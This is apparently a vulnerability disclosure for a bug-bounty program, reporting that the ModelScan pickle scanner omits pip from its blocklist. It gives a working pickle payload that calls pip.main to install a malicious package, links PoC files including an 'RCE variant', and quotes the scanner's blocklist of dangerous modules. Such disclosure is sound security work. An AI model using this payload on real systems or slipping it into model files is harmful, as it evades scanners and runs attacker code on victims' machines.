HUNTR MFV SUBMISSION - ModelScan pip.main() Bypass
Target Format
Pickle (.pkl) β Python
Title
ModelScan Scanner Bypass via pip.main() - Missing Blocklist Entry
HuggingFace PoC
https://huggingface.co/kfoughali/mfv-modelscan-pickle-bypass
Files:
scanner_bypass_poc.pkl(54 bytes) - Safe demo (pip --help)scanner_bypass_rce.pkl(89 bytes) - RCE variant
Description
Vulnerability Summary
ModelScan 0.8.7 (latest version) does NOT include pip in its blocklist of unsafe modules. This allows an attacker to create a malicious pickle file that:
- Passes ModelScan security checks β Reports "No issues found"
- Executes arbitrary code β Via
pip.main(['install', 'malicious-package']) - Enables supply chain attacks β Malicious models appear safe
This is the same class of vulnerability as CVE-2025-1716 (picklescan pip.main() bypass), but affects ModelScan which is used by ProtectAI and integrated into security pipelines.
Category
β Techniques that trick or evade automated scanners, allowing malicious model files to go undetected.
Proof of Bypass
ModelScan Output
$ modelscan --version
modelscan, version 0.8.7
$ modelscan --path scanner_bypass_poc.pkl
Scanning scanner_bypass_poc.pkl using modelscan.scanners.PickleUnsafeOpScan
--- Summary ---
No issues found! π
ModelScan Blocklist (Missing pip)
Current blocklist in modelscan/settings.py:
"CRITICAL": {
"__builtin__": [
"eval",
"compile",
"getattr",
"apply",
"exec",
"open",
"breakpoint",
"__import__",
],
"builtins": [
"eval",
"compile",
"getattr",
"apply",
"exec",
"open",
"breakpoint",
"__import__",
],
"runpy": "*",
"os": "*",
"nt": "*",
"posix": "*",
"socket": "*",
"subprocess": "*",
"sys": "*",
"operator": [
"attrgetter",
],
"pty": "*",
"pickle": "*",
"_pickle": "*",
"bdb": "*",
"pdb": "*",
"shutil": "*",
"asyncio": "*",
# NOTE: "pip" is MISSING from this list!
},
Code Execution Proof
import pickle
# Loading the PoC executes pip.main()
with open('scanner_bypass_poc.pkl', 'rb') as f:
pickle.load(f) # Executes: pip install --help
Technical Details
The Payload
import pickle
class PipBypassRCE:
def __reduce__(self):
import pip
return pip.main, (['install', 'malicious-package'],)
# Create malicious pickle
payload = pickle.dumps(PipBypassRCE(), protocol=4)
Pickle Opcodes
0: \x80 PROTO 4
11: \x8c SHORT_BINUNICODE 'pip' <- Module not in blocklist
17: \x8c SHORT_BINUNICODE 'main' <- Function to call
24: \x93 STACK_GLOBAL <- pip.main
29: \x8c SHORT_BINUNICODE 'install' <- Arguments
51: R REDUCE <- Call pip.main(['install', ...])
Attack Vector
- Attacker creates malicious PyPI package with RCE in
setup.py - Attacker creates pickle that calls
pip.main(['install', 'malicious-pkg']) - Pickle passes ModelScan security checks
- Victim loads pickle β pip installs malicious package β RCE
Impact
| Impact | Description |
|---|---|
| Scanner Bypass | ModelScan 0.8.7 reports "No issues found" |
| Code Execution | Arbitrary code runs via pip install hooks |
| Supply Chain | Malicious models appear safe on model hubs |
| Wide Scope | Affects all ModelScan users (ProtectAI ecosystem) |
Related Vulnerabilities
- CVE-2025-1716: Same vulnerability in picklescan (patched in 0.0.22)
- ModelScan has NOT patched this yet
Reproduction Steps
Prerequisites
pip install modelscan
Step 1: Verify Scanner Bypass
modelscan --path scanner_bypass_poc.pkl
# Expected: "No issues found! π"
Step 2: Verify Code Execution
import pickle
with open('scanner_bypass_poc.pkl', 'rb') as f:
pickle.load(f) # Will show pip install help
Recommended Fix
Add pip to ModelScan's blocklist in modelscan/settings.py:
"CRITICAL": {
"__builtin__": [
"eval",
"compile",
"getattr",
"apply",
"exec",
"open",
"breakpoint",
"__import__",
],
"builtins": [
"eval",
"compile",
"getattr",
"apply",
"exec",
"open",
"breakpoint",
"__import__",
],
"runpy": "*",
"os": "*",
"nt": "*",
"posix": "*",
"socket": "*",
"subprocess": "*",
"sys": "*",
"operator": [
"attrgetter",
],
"pty": "*",
"pickle": "*",
"_pickle": "*",
"bdb": "*",
"pdb": "*",
"shutil": "*",
"asyncio": "*",
"pip": "*", # <-- ADD THIS LINE
},
This matches the fix applied to picklescan for CVE-2025-1716.
Files Provided
| File | Size | Description |
|---|---|---|
scanner_bypass_poc.pkl |
54 B | Safe PoC (pip --help) |
scanner_bypass_rce.pkl |
89 B | RCE variant |
References
- CVE-2025-1716: https://nvd.nist.gov/vuln/detail/CVE-2025-1716
- GHSA-655q-fx9r-782v: https://github.com/advisories/GHSA-655q-fx9r-782v
- ModelScan: https://github.com/protectai/modelscan
- Sonatype Research: https://www.sonatype.com/blog/bypassing-picklescan-sonatype-discovers-four-vulnerabilities
Researcher: Karim Foughali
Email: kfoughali@dzlaws.org
Date: January 2026
Inference Providers
NEW
This model isn't deployed by any Inference Provider.
π
Ask for provider support